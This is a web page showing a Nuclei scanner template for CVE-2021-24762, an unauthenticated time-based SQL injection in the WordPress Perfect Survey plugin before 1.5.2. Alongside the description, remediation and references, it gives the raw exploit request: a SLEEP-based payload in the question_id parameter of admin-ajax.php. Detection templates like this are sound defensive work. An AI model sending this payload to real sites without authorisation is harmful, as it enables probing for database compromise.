Skip to content
Nuclei Templates

WordPress Perfect Survey <1.5.2 - SQL Injection

ID: CVE-2021-24762

Severity: critical

Author: cckuailong

Tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey

Description

Section titled “Description”

Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24762


info:
  name: WordPress Perfect Survey <1.5.2 - SQL Injection
  author: cckuailong
  severity: critical
  description: |
    Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50766
    - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
    - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24762
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24762
    cwe-id: CWE-89
    epss-score: 0.33888
    epss-percentile: 0.96671
    cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: getperfectsurvey
    product: perfect_survey
    framework: wordpress
  tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey


http:
  - raw:
      - |
        @timeout: 15s
        GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'


      - type: word
        part: header
        words:
          - "wp-ps-session"


      - type: status
        status:
          - 404
# digest: 4a0a00473045022100bdf4261195c7abfaae51996938f98da499e218474d4090680a7808533670dd190220526da1ee7bd98d624310b11fb47ba711c637f20d02c68ee8ebf2cc18fc58c4f6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24762.yaml"

View on Github